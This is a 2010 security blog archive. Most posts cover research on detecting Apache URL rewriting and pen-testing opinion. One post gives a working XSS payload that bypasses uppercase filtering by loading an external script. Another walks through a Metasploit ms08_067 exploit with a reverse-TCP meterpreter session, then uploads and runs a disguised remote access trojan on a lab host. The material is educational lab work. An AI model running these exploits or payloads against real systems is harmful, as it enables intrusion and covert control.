08 October 2010

Detecting URL Rewriting (part 2)

This post is a continuation of my documenting the process I go through to come up with some way a client of a web site can first: determine if URL rewriting is occurring on a given web server, and second: in cases where it is used, determine what the rewrite rules are.

I left off with Apache configured, and a simple rule established for mod_rewrite. I now need to decide whether to use mod_rewrite to handle the rewrite using a redirect (via an HTTP 302 response), or to process it internally. As I mentioned, the difference between these two methods is quite large.

For example, if I choose to send a redirect, (eg. by amending our rule to include an [R] flag), like so ...
RewriteRule    /litterbox/(.*)  /sandbox/$1 [R]
... the rewrite rule will cause an incoming request to http://bar.com/litterbox/bar1.php to be redirected to the location http://bar.com/sandbox/bar1.php instead by using HTTP server headers.

Examining the relevant portion of the HTTP request and response headers associated with this process, the conversation looks like this:

Initial request:
GET /litterbox/bar1.php HTTP/1.1
Host: bar.com

Initial response:
HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 04:50:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Location: http://bar.com/sandbox/bar1.php

In the response above, notice that the server has returned an HTTP 302 status response, and included a Location: header which contains the URL to the content. The browser receives this, and sends a new request to that location:

Redirected request:
GET /sandbox/bar1.php HTTP/1.1
Host: bar.com

This request is met with the final response, which includes the content at /sandbox/bar1.php:
HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:50:29 GMT

This is how I've used mod_rewrite in the past. The rules I've set to enforce SSL have been very similar to the one given in the example. At first glance, it seems that it will be easy to tell when rewriting is occurring... all that's required is to look for the 302 response!

Not so fast

There are a couple problems with this theory. The first is: there are other mechanisms which can be used to provide this same HTTP response code. For example, the following PHP code will cause an HTTP 302 response to be sent by the server:
<?php
header("Location: http://bar.com/sandbox/bar1.php");
?>

When I put that code into a file located at http://bar.com/redir.php, the response to a GET request for that file looks pretty much exactly like the one generated natively by Apache above:

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 05:38:09 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Location: http://bar.com/sandbox/bar1.php

From this, it would seem that there is no way to distinguish between a redirect coming from mod_rewrite, and one stemming from some other mechanism.

More importantly though, and a bigger blow to my high hopes for an easy answer, is that the [R] flag is optional. By default, a redirect header isn't returned by Apache at all when mod_rewrite is used. Looking up how Apache handles rewriting, there's a fair amount of documentation on the process specific to the 2.2 version of Apache I'm using:

The nutshell version is this: Requests which are rewritten and not using a 302 response to the client are processed completely within the Apache Kernel only. There's no indication given to the client that a redirect has occurred.

In fact, it appears that the only way an application hosted on the server can know that it has been reached via a rewritten request is by checking for the presence of one or both of two server headers which only appear when Apache has processed a rewrite ... they do not appear on a redirect, despite their name =)

(Recall that I can see these because the PHP script I wrote includes a printout of every server header. It seems that doing this was a good idea indeed!):

REDIRECT_STATUS = 200
REDIRECT_URL = /litterbox/bar1.php

Note that these headers are different than the ones the Apache documentation says it adds. I'm not sure why that is, but since these headers are only available as server variables, they are completely outside the reach of a client accessing a given URL on the host.

That sucks.

At this point, I give up on the 302 response and Location: header theory: it's both misleading (in that a 302 response may not be the result of a URL rewrite), and inconsistent in that rewritten URLs may not provide a 302 response at all.

I start thinking of other mechanisms I could use. One that comes immediately to mind is the Referer header. This is an HTTP header which is provided to a web server when, for example, a user clicks a link. The destination host the link resolves to receives the request for a URL, along with where the user came from. An example of this can be seen here:

Initial Request:
GET /litterbox/bar1.php HTTP/1.1
Host: bar.com

Initial Response:
HTTP/1.1 200 OK
Date: Fri, 08 Oct 2010 05:51:54 GMT
[content]
  <div><a href="bar2.php">bar2</div>
[more-content]

The content served in the response contains a link to bar2.php. When I click that link, the fact that I'm coming from the bar1.php page is sent in the request, as shown below:
Request to bar2.php:
GET /sandbox/bar2.php HTTP/1.1
Host: bar.com
Referer: http://bar.com/litterbox/bar1.php


That's all well and good, but as you can see, the Referer still shows /litterbox as the URL I was coming from. That's because the referer is specified by the user agent (a browser in this case). Since the browser didn't receive any indication that the content it is being served has come from a different location than it requested, it thinks it's still at /litterbox and so sends that location in the headers.

So much for using that as a detection of rewriting. What's next...
So far, I've tried a couple of different ideas to try to determine if a client can tell whether URL rewriting is in use or not. I've ruled out using a 302 response and accompanying Location: header as being unfit for this purpose. I've also briefly played with the idea of using Referer, and quickly ruled that out as an option as well. I need to come up with some more creative way to try to tell.

How about timing?

Thinking about this problem a bit, it occurs to me that, since the Apache kernel has to map rewritten URLs internally to come up with a computed URL to serve content from, that I may be able to use how long a request takes to load as an indicator.

To test this theory out, I'm going to use ruby, because I'm familiar with it, and it allows me to quickly throw together some proof-of-concept code.

Since I have the advantage in this case of knowing for sure what is being rewritten and what is not, I can use the benchmark module in ruby to measure the time it takes to get a file where rewriting is occurring, and where it is not. I can then compare the two to see if this theory bears further investigation.

For the intital test, I decide to use the bmbm method of the benchmark module for two reasons: 1) it automatically gives me two iterations to compare. But more importantly it 2) initializes the environment and tries to minimize skewed results by going through a rehearsal process before benchmarking "for reals". Once I decided that, I came up with the following script:

#!/usr/bin/env ruby
require 'net/http'
require 'uri'
require 'benchmark'
include Benchmark

bmbm do |test|
  test.report("rewrite:") do
    Net::HTTP.get_response URI.parse('http://bar.com/litterbox/bar1.php')
  end
  test.report("non-rewrite:") do
    Net::HTTP.get_response URI.parse('http://bar.com/sandbox/bar1.php')
  end
end

I've created two labels in this benchmark: one for the known rewritten URL, and one for the known non-rewritten URL. When I run this script, I get the following results:

Rehearsal ------------------------------------------------
rewrite:       0.010000   0.000000   0.010000 (  0.001429)
non-rewrite:   0.000000   0.000000   0.000000 (  0.000876)
--------------------------------------- total: 0.010000sec

                   user     system      total        real
rewrite:       0.000000   0.000000   0.000000 (  0.001105)
non-rewrite:   0.000000   0.000000   0.000000 (  0.000907)

That's pretty interesting! When I run this on the same host the web server is located at, I can definitely tell a difference between rewritten and non-rewritten content!

I need to look into this further. The first thing that needs to happen is, I need to perform these requests many more times and look at the timing. A single request is useful for a quick "is there merit to this", but the fact that it appears this may work could just be a fluke in the given requests at that particular time. I need to increase the number of times I perform this test and prove whether, statistically, there is a difference in the time it takes to serve a rewritten URL vs a non-rewritten one.

I also need to look at what factors may affect the results. Some immediate considerations that come to mind are:
  1. is the Apache server cacheing content, causing it to be served faster the second time?
  2. Am I able to prevent that if so?
  3. On a local machine, this may work, but what happens across a LAN?
  4. What happens to the timing when requests go across the Internet?
  5. How much does "heavy" content (video, images, etc.) affect the timing?
  6. Can I time just getting the HTTP headers, to avoid loading content?

I need to answer some of these before testing, and some of these will be answered as the testing progresses.

[to be continued]

01 October 2010

Detecting URL Rewriting (part 1)

[edit 2010-10-02]: i realized after replying to cdman's comment that i had neglected to include the goals of this project in this post, but had included them in this one instead. I've edited the beginning here to include the first part of that post.

As I mentioned earlier: I’ve been pondering URL rewriting for the past couple of days - trying to come up with some way a client of a web site can first: determine if URL rewriting is occurring on a given web server, and second: in cases where it is used, determine what the rewrite rules are.

I started this process by doing some homework to learn more about how URL rewriting occurs. I’ve used Apache’s mod_rewrite in the past to accomplish some basic tasks like redirecting incoming http:// requests to their https:// counterpart to enforce SSL usage, but I had never done much beyond that.

I decided (as I often do) that the best way to learn was to play. To determine whether URL rewriting is in use, and to try to map the rules, means that I need to have a portion of a web site that is using URL rewriting, and one that is not (so I can compare the two). I further need to have some rewrite rules. Coming up with a random set of rules is difficult, so I gave myself what was, in my mind, a likely scenario:

The Bar, Inc. marketing dept. has realized that their ‘litterbox’ product line has a name which creates a negative impression. It’s decided that ‘sandbox’ is a much better brand for the products. Of course, with the rebranding, the web site has to be updated, it simply won’t do to have links going to bar.com/litterbox/ now that the name has changed.

Begrudgingly, the developers of the Bar, Inc. website put in a ton of overtime to change all the links in the code. Then someone realizes that all the Bar, Inc. customers and business partners also have links that are going to break. The developers can’t do anything about that, it’s outside their control. It now falls to the sysadmin to make sure that no critical third party links get broken.

As the sysadmin, my task is simple: take any requests for /litterbox/whatever and have them go to /sandbox/whatever instead.


Excellent! I now have an interesting story to keep me from getting bored. (OK, fine… interesting is subjective ;-)

More importantly, the fictitious set of requirements dictated in the scenario means that I have a framework established for how to approach setting up this research project.

That means it’s time to get to work.

Preparing The Environment


To get this set up in a way that meets the criteria of the scenario, I first need to have a website. I have a Linux box handy, so I decide to do my testing using Apache. The specific version and OS I’m using is Apache 2.2.9 on Debian Linux, with the Suhosin Patch. In other words, I’m using the default apache2 (mpm-prefork) package on Debian 'lenny'.

I create a directory named sandbox in the Apache web root (which is /var/www on Debian). I then create 4 files in that directory: bar1.php, bar2.php, bar3.php, and bar4.php. Next I edit each of these files to contain some generic code similar to the following, (changing the title and h1 tags to correspond to the file name):
<head>
<title>bar1</title>
</head>
<body>
<h1>bar1</h1>
<div><a href="bar1.php">bar1</div>
<div><a href="bar2.php">bar2</div>
<div><a href="bar3.php">bar3</div>
<div><a href="bar4.php">bar4</div>
<hr />
<?php
foreach($_SERVER as $key_name => $key_value) {
print $key_name . " = " . $key_value . "<br>";
}
?>
</body>
</html>


The PHP code in these files simply spits out the HTTP Server headers key/value pairs to the page. This may prove useful to review, so I'm including it in each page.

Now that I have the Bar, Inc. "website" in place it’s time to contemplate how to proceed – I have at least three four options:
Edit 2010-10-04: I'd neglected to consider the Apache Alias directive. I've added that to the list.
  1. I can enable the SymLinks option and create a link from litterbox to sandbox.
  2. I can use mod_rewrite to change requests for litterbox to sandbox.
  3. I can use mod_rewrite to send an HTTP 302 response redirecting requests to the new location.
  4. I can use the Apache Alias directive to redirect requests to litterbox to a specific path on the file system

After considering these for a bit, I decide that leaving a bunch of stale links lying around the directory tree is a BadThing. For similar reasons, I decide not to use the Alias directive, so that future sysadmins don't become confused. Accordingly, I select mod_rewrite as the way to go. (Thankfully, since that’s the whole point of this project ;-)

Setting up mod_rewrite


The first thing I need is for the mod_rewrite module to be loaded in the Apache configuration. How this occurs varies based on the installation of Apache. In Debian it’s extremely simple to accomplish this task, a single command (and later, a reload of the Apache server) will suffice:
# a2enmod rewrite


Now that the module is enabled, I need to define some rules. This can be done by editing the configuration file that defines the web site. In Debian, this means editing the file /etc/apache2/sites-available/<site-name>. Because I’m just using the default configuration, I place my changes in /etc/apache2/sites-available/default.

The syntax for mod_rewrite can be quite complex, and there are some very powerful features that it provides. However, the scenario I set for myself dictates what I need to establish as far as the rewrite rules… that is, I need to change "litterbox" to "sandbox". Configuring this in Apache is easy enough, it looks like this:
RewriteEngine on
RewriteRule    /litterbox/(.*)  /sandbox/$1


The first line turns on the RewriteEngine. The second one establishes that I want to replace any instance of "/litterbox/" followed by one or more characters, with "/sandbox/" followed by whatever other characters were present when the request came in.

That single line should accomplish the goal of my scenario, however I still have one choice left to make: I need to decide whether I should use mod_rewrite to accomplish this task via an HTTP redirect, or to rewrite the requests.

The difference between these two is not trivial.
Before I go any further, I need to gain a better understanding of how URL rewriting works in Apache.


[to be continued]

on security research

I’ve been pondering URL rewriting for the past couple of days - trying to come up with some way a client of a web site can first: determine if URL rewriting is occurring on a given web server, and second: in cases where it is used, determine what the rewrite rules are.
As I have been thinking about this, it occurred to me that, despite the proliferation of security research whitepapers and blog posts, there is a scarcity of ‘this is the process I went through to do this research’ information out there.

There are mountains of articles and documents, with dizzying arrays of statistics and metrics (often intermingled with a fair amount of marketing fluff), and yet most of the whitepapers, and certainly the various conference presentations, simply don’t talk about the process - preferring instead to present the end results.
As security professionals, we gather together at a multitude of conferences where we do a wonderful job displaying all of this shiny data and showing off new marvelous tricks to each other with varying degrees of self-indulgence. Yet most of how we came to have such cool stuff is left out of the picture entirely.

I understand why that is, of course. Simply put, the process is boring! It’s full of failure, and repeatedly throwing things at a wall and observing what happens. Nobody wants to sit in a small room with a couple hundred hackers listening to someone drone on for an hour about how “this didn’t work…and neither did this”, I get that. Added to that is the fact that, in some cases, the research is being done for a corporate (or government) entity. In such a situation, the process may be withheld not from a lack of desire to share on the researcher’s part, but because they are not permitted to do so by the organization for which the work was done.

Despite these reasons, in my opinion it is a disservice to ourselves, to the profession, and to others whom may be interested in performing their own research, when we all we do is deliver an end product in glossy PDF or a shiny PowerPoint presentation. That is simply not research, it’s promotion. Research, in an academic sense, implies documenting the entire process: both success and failure. This is not what I find when I look at the typical infosec industry output.

Accordingly, I’ve decided that I will share how I go about this particular project, and not just release some PDF or tool as a result of it. I’ll post my process here, any notes and thoughts, as well as any code I come up with. (Well, links to code anyway. I’ll probably keep the code itself in github).

One of the reasons I’m doing this is that I expect to fail. =)

As I’ve considered how one can detect URL rewriting, and as I’ve started investigating the details of how it works, my initial thought is that detecting it simply won’t be possible.

If that’s correct, I think it’s important that I present what I tried, along with the fact that ultimately it didn’t work. That’s vital information, in that it prevents someone else from wasting cycles repeating a process that’s already been done.

As well, understanding why something failed may lead to discovering a way to succeed.

OK… this rant being done now, my next post will start the process of documenting my research into detecting URL rewriting.

27 May 2010

thinking sideways

Had an interesting question posed to me today. A web application was using portions of the GET request to create content on a page, and not properly sanitising the input. The result was a web page that was potentially vulnerable to cross-site scripting (XSS). However, there was a catch. The application, while not checking for security risks, was converting the GET request parameters to all uppercase.

This meant that, since javascript is case sensitive, the usual methods wouldn't work For example you couldn't use document.write(), or alert(), because they were rendered as DOCUMENT.WRITE() or ALERT() instead.

Here's a quick and dirty PHP script I wrote that mimics this behaviour (note that you will need to have GPC_MAGIC_QUOTES turned off in the php.ini for this to work)
<?php
echo '<form name="testform" method="post">';
echo '<select name="test">';
if (isset($_GET['options']) ) {
echo strtoupper($_GET['options']);
} else {
echo '<option value="empty">EMPTY</option>';
}
echo '</select>';
echo '<input type="submit" name="submit" value="submit" />';
echo '</form>';
?>


To test it out, simply browse to http://yourhost.yourdomain/test.php?options=uppercaseftw


So, the question as a pen tester is, how can I break this?

Turns out the answer is pretty simple: you simply make your own javascript file, host it on a server somewhere, give it an uppercase file name, and create functions with uppercase names.

For example, I created the following XSS() function, in a file named XSS.JS:

function XSS() {
alert('xss'); // or whatever
}


Now, I need to load this code into the page I'm requesting, and then somehow call the XSS() function. I did this by closing the select tag in my options GET parameter, and providing my own script tag. I then created a link to "foo", and set an onMouseOver event to call the XSS() function.

Here's what the request URL looks like to exploit this code:
http://localhost/sandbox/index.php?options=<option value="number1">number1</option></select><script language="javascript" src="XSS.JS"></script><a href="foo" onmouseover="XSS()">clicky</a>   <!--


The result is a nice link that, upon placing the mouse over it, triggers the javascript event which fires off the usual alert box.

The source code of the resulting page looks like this:
<form name="testform" method="post">
<select name="test">
<OPTION VALUE="NUMBER1">NUMBER1</OPTION>
</SELECT>
<SCRIPT LANGUAGE="JAVASCRIPT" SRC="XSS.JS"></SCRIPT>
<A HREF="FOO" ONMOUSEOVER="XSS()">CLICKY</A>
<!--</select>
<input type="submit" name="submit" value="submit" />
</form>


Nothing particularly awesome about this, but it was a situation I'd not come across before, and it took me a minute to figure out a way around it. So I thought I'd share =)

03 May 2010

on pen testing and fireworks

eEye posted a blog entry recently that attempted to compare providing free tools for pen testing to encouraging someone to use fireworks. This post from eEye is actually part of a growing pattern of 'pen test/full disclosure == criminal' BS being tossed around by various companies (notably, each of which perform vulnerability assessments themselves), but I don't have time to fully address my thoughts on that at the moment (hint: there's another post coming later on this topic).

Specifically, eEye's post makes the following statements:

Penetration tools clearly allow the breaking and entering of systems to prove that vulnerabilities are real, but clearly could be used maliciously to break the law.

Making these tools readily available is like encouraging people to play with fireworks. Too bold of a statement? I think not. Fireworks can make a spectacular show, but they can also be abused and cause serious damage. In most states, only people licensed and trained are permitted to set off fireworks.


This analogy is flawed for a number of reasons, not least of which is the fact that the statement that most states disallow fireworks to people other than licensed pyrotechnicians is untrue.

I made a comment to their site about this, but as it has not been approved yet, I'm posting my comment here as well.

Here's my two bits:

Since you relate the use of free pen test tools to fireworks as an argument, it should probably be pointed out that the majority of states in the US permit consumer fireworks, and only a very few disallow them. See: http://www.cpsc.gov/cpscpub/pubs/012.html

Perhaps the free pen test tools are “consumer grade” vs. the commercially licensed products that, to follow your analogy, should apparently only be used by licensed professionals (though frankly, I know folks in #metasploit that I trust with these tools more than many CISSPs that I know…)

Either way, I’m glad these tools are available, and free, and I am as grateful that I can use them as I am for the fond memories I have of lighting off fireworks with my family as a child. There’s something about being out in the field and participating that makes the moment much more enjoyable than simply watching someone else do it for you.


*update*
eEye has since replaced the entirety of the original post with one that essentially states "ummm... we meant that using free pen testing tools without permission is bad". *sigh*.

25 March 2010

Even When You Know You're Pwnd, It's Hard To See

I'm playing around with a RAT showdown for a project I'm working on (teaser: It will be a comparison of SharK 3.1, Poison Ivy 2.3.2, and the GPL version of Immunity Inc's Hydrogen).

While doing this, it really hit home how tough it is to tell a host has been owned if it's being done right.

I know this anyway, having been on the incident response side of things for a number of years, so it's not news really. It's just that every now and then something springs back up from memory and smacks you clear across the face and screams "Oh Yeah!" in a Randy "Macho Man" Savage impression. This was one of those moments for me.

Let me give an example. I'll do that, by combining it with a "how to use the metasploit framework to upload binaries" overview first.

So, step 1 is: get MSF3, and run the msfconsole. I'm going to skip that step here, and jump straight to setting the payload we want (meterpreter), and exploiting.

First, set the payload:

 msf > setg payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp


Now pick everyone's favorite exploit: ms08_067_netapi
 msf > use exploit/windows/smb/ms08_067_netapi 


Let's take a look at the options:
msf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST 10.0.1.51 yes The local address
LPORT 4444 yes The local port


Exploit target:

Id Name
-- ----
0 Automatic Targeting


Some of these were set for me via my msfconsole.rc file (specifically, the LHOST setting for the payload.)
Now I pick the target I'll be exploiting, and set it with the RHOST option:

msf exploit(ms08_067_netapi) > set RHOST 10.0.1.71
RHOST => 10.0.1.71


Once that's all set, I can exploit the host:
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.0.1.51:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (10.0.1.51:4444 -> 10.0.1.71:1082)


BAM! I have a meterpreter session (ms08_067 isn't called 'old faithful' for nothing.)

OK. Pentest done. Next B0x!

Unfortunately, that's too often the case. This is sad really, because there's so much more I can do with this. Like the following ;-)

Let me start by finding out some information about the session, what privs I have on the host, and what process I'm running under:

 meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > getpid
Current pid: 1108

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
632 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
680 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
704 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
748 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
764 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
940 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
988 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1108 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1184 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1280 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1448 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1704 explorer.exe x86 0 VIKTIM2\viktim C:\WINDOWS\Explorer.EXE
1860 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe
352 mqsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\mqsvc.exe
832 mqtgsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\mqtgsvc.exe
768 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
4032 sqlservr.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
4052 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
4044 dllhost.exe x86 0 VIKTIM2\IWAM_VIKTIM2 C:\WINDOWS\system32\dllhost.exe
3692 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
3896 IEXPLORE.EXE x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Internet Explorer\IEXPLORE.EXE


Pretty cool. As expected, I'm running as the local system, and have attached to the svchost.exe process (pid# 1108).

If I look at the current working directory for the session, I see it's the Windows system32 directory:
meterpreter > pwd
C:\WINDOWS\system32


That's all very cool, but for this example, I want to interact with a user session.
Looking at the process list, I see that there's a 'viktim' user logged in and that user is running explorer.exe in process 1704.

I'm going to try to switch to that process, using the handy migrate function provided by metasploit:

meterpreter > migrate 1704
[*] Migrating to 1704...
[*] Migration completed successfully.

meterpreter > getuid
Server username: VIKTIM2\viktim


Excellent. I've now switched to a process running in the context of my target user.
Let me take a look at what my current directory is now:

meterpreter > pwd
C:\Documents and Settings\viktim


What I want to do now is to upload my malware to the host.
In this case, I'll be uploading a remote access trojan I built using sharK.
I've named the executable msdce32.exe in a sad attempt to be sneaky ;-)
To upload the file to the victim host, I use the upload function in meterpreter:

 meterpreter > upload msdce32.exe
[*] uploading : msdce32.exe -> msdce32.exe
[*] uploaded : msdce32.exe -> msdce32.exe


Looks like the file upload was successful, so I try running it using the execute command.
This command takes a -f parameter with the filename to execute:

meterpreter > execute -f msdce32.exe
Process 292 created.


Very nice. Looking at my sharK console, I see that the process worked, because my victim has now connected to my SIN and I am able to use sharK to interact with it. (That will be a different post entirely, but here's a screenshot of what it looks like. Note that the XP Desktop in the image below is actually a screen capture of the victim host that sharK provides when you mouseover the connection in the SIN):




Since I'm done exploiting my victim user, let me return back to the host and go back to a system process using the getsystem method in meterpreter:

meterpreter > getsystem
...got system (via technique 1).


Since I'm back at system, let me see if I can see my trojan running:

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
632 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
680 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
704 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
748 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
764 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
940 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
988 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1108 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1184 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1280 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1448 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1704 explorer.exe x86 0 VIKTIM2\viktim C:\WINDOWS\Explorer.EXE
1860 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe
352 mqsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\mqsvc.exe
832 mqtgsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\mqtgsvc.exe
768 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
4032 sqlservr.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
4052 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
4044 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
3692 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
3896 IEXPLORE.EXE x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Internet Explorer\IEXPLORE.EXE
2988 IEXPLORE.EXE x86 0 VIKTIM2\viktim C:\Program Files\Internet Explorer\IEXPLORE.EXE
916 IEXPLORE.EXE x86 0 VIKTIM2\viktim C:\Program Files\Internet Explorer\IEXPLORE.EXE
3448 IEXPLORE.EXE x86 0 VIKTIM2\viktim C:\Program Files\Internet Explorer\iexplore.exe


Hmm.. Nothing really stands out.
For fun, I killed the server from the sharK SIN, and compare the process table without the RAT running:

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
632 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
680 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
704 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
748 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
764 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
940 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
988 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1108 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1184 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1280 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1448 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1704 explorer.exe x86 0 VIKTIM2\viktim C:\WINDOWS\Explorer.EXE
1860 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe
352 mqsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\mqsvc.exe
832 mqtgsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\mqtgsvc.exe
768 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
4032 sqlservr.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
4052 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
4044 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
3692 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
3896 IEXPLORE.EXE x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Internet Explorer\IEXPLORE.EXE
2988 IEXPLORE.EXE x86 0 VIKTIM2\viktim C:\Program Files\Internet Explorer\IEXPLORE.EXE
3364 IEXPLORE.EXE x86 0 VIKTIM2\viktim C:\Program Files\Internet Explorer\iexplore.exe


If you can't see a difference between the 'infected' and 'not infected' states, it's because there's not much of one.
Here's the output from running the 'diff' command on the process tables:

 $ diff running notrunning
32,33c32
< 916 IEXPLORE.EXE x86 0 VIKTIM2\viktim C:\Program Files\Internet Explorer\IEXPLORE.EXE
< 3448 IEXPLORE.EXE x86 0 VIKTIM2\viktim C:\Program Files\Internet Explorer\iexplore.exe
---
> 3364 IEXPLORE.EXE x86 0 VIKTIM2\viktim C:\Program Files\Internet Explorer\iexplore.exe


As you can see, it's pretty tough to tell that this host is compromised just based on that.

You could see that it was compromised in the network traffic perhaps, as the RAT communicates with its control center. However, if a standard port was being used for the comms (say, TCP/80 for example) it could be difficult to tell even then without looking at the actual packets to examine the data.

Like I said, this wasn't really something I just figured out, it was just a very nice, clearly defined example of it.

04 March 2010

Finding Live Hosts on the Local Network Segment Using Metasploit

I've been learning ruby of late, and one way I'm doing that is by tearing into Metasploit. This has a few nice benefits for me:

* I get to see real code, written by smart people
* I get to learn metasploit a lot better
* I get to figure out how to write my own modules for metasploit

Since I've got a couple of arp flood/sweep scripts I've written in both perl and python, I figured that'd be a decent place to start.

It turns out that metasploit has a module already to do this (arp_sweep.rb), so I started out by taking a look at it. At first, I thought it didn't do an active sweep, because it appeared to operate on a pcap file only. I tweeted a question to #metasploit about that, and was quickly informed by @hdmoore that the module does indeed work on the target network, I just needed to set the INTERFACE option.

At that point I realized I should probably stop relying on just the code, and start poking at things from within the console =)

